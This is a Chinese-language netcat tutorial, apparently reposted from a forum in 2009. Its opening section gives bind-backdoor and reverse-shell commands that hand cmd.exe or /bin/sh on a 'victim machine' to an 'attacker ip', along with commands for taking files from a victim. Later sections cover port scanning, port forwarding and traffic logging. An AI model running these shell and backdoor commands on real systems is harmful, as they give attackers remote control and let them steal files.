首页 编程 软件学院 查看内容

NetCat详解

2009-8-26 10:59 856 0

摘要: 首先介绍一些常用的: 充当一个bind后门用,这个功能我估计很多人都在用victim machine: //受害者的机器nc -l -p port -e cmd.exe //win2000nc -l...
关键词: localhost jfranken attacker port nc machine connection open 195.88 netcat

首先介绍一些常用的: 充当一个bind后门用,这个功能我估计很多人都在用victim machine: //受害者的机器nc -l -p port -e cmd.exe //win2000nc -l -p port -e /bin/sh //unix,linuxattacker machine: //攻击者的机器.nc ip -p port //连接victim_IP,然后得到一个shell。 反向连接,反弹得到一个shell nc -e cmd.exe attacker ip -p portnc -e /bin/sh attacker ip -p port 或者:attacker machine:nc -vv -l -p port1 /*用于输入*/nc -vv -l -p prot2 /*用于显示*/victim machine:nc attacker_ip port1 | cmd.exe | nc attacker_ip port2nc attacker_ip port1 | /bin/sh | nc attacker_ip port2139要加参数-s(nc.exe -L -p 139 -d -e cmd.exe -s 对方机器IP)这样就可以保证nc.exe优先于NETBIOS。 文件传输的作用 nc -d -l -p port   path\file.txt /*victim machine*/ 从目标机器拖文件回来 nc -vv -l -p port > path\file.txt      /*victim machine*/ 需要Ctrl+C退出 上传文件到目标机器 nc -d victim_ip port < path\filedest   /*attacker machine*/ 可以shell执行 当然,我们也可以用NC来扫描端口,如下操作nc -vz PARAMETER hostname PORTRANGES 一些参数的意思Parameter Meaning-v show the closed ports as well-w <seconds> timeout for connection setup-u udp instead of tcp. Best used together with -w-r try the ports in random order-i <seconds> delay after each tested port下面是一个端口扫描的实例:$ nc -vz www.jfranken.de 1-1024 www.jfranken.de [195.88.176.20] 443 (https) open www.jfranken.de [195.88.176.20] 110 (pop3) open www.jfranken.de [195.88.176.20] 80 (www) open www.jfranken.de [195.88.176.20] 53 (domain) open www.jfranken.de [195.88.176.20] 25 (smtp) open www.jfranken.de [195.88.176.20] 22 (ssh) open $ nc -vz -vur -i 1 -w 2 localhost 1024 108-112 localhost [127.0.0.1] 1024 (?) open localhost [127.0.0.1] 109 (pop2) : Connection refused localhost [127.0.0.1] 112 (?) : Connection refused localhost [127.0.0.1] 111 (sunrpc) open localhost [127.0.0.1] 110 (pop3) : Connection refused localhost [127.0.0.1] 108 (?) : Connection refused sent 0, rcvd 0 当然,我们也可以用NC作为端口转发的工具来使用With netcat and inetd you can forward local ports to other hosts. The following line in /etc/inetd.conf on host2 will locally provide host 3's port 80.80 stream tcp nowait nobody /usr/bin/nc /usr/bin/nc -w 3 host3 80 If you like logging and access control, you can change the first /usr/bin/nc to /usr/sbin/tcpd或者,在一般的情况下,可以使用NC替代一些嗅探工具来抓包嗅探; Sniffing tools like tcpdump, snoop, iptraf or ethereal are quite popular for debugging network applications. But in order to use them, you need to be root. With netcat you can also capture network connections as a normal user: just point your application to a local netcat, which loggs everything and then forwards it to the server. To do so, just replace the term PROGRAM in the above mydemon-script withnetcat -o /tmp/sniffer.`date +%s.$$` tp.jfranken.de 80 and call it with parameter 4321. netcat will now create a logfile for each access to that port in your /tmp-directory. For example: After I had opened http://localhost:4321 with my browser, there was the following logfile: $ cat /tmp/sniffer.1045474262.5864 > 00000000 47 45 54 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a # GET / HTTP/1.1.. > 00000010 55 73 65 72 2d 41 67 65 6e 74 3a 20 4f 70 65 72 # User-Agent: Oper > 00000020 61 2f 36 2e 31 31 20 28 4c 69 6e 75 78 20 32 2e # a/6.11 (Linux 2. [...] < 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d # HTTP/1.1 200 OK. < 00000010 0a 53 65 72 76 65 72 3a 20 74 68 74 74 70 64 2f # .Server: thttpd/ < 00000020 32 2e 32 31 62 20 32 33 61 70 72 32 30 30 31 0d # 2.21b 23apr2001. < 00000030 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 # .Content-Type: t [...] < 00002180 0a 3c 2f 46 52 41 4d 45 53 45 54 3e 0a 3c 2f 48 # .</FRAMESET>.</H < 00002190 54 4d 4c 3e 0a # TML>. 恩,NetCat的精髓同样是波大精深,多的我就不累赘了,还有很多功能要靠大家日常的积累和挖掘了,推荐一本书,博大精深的书《NetCat Power Tool》 ,相信大家看了之后会有意外的收获的
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部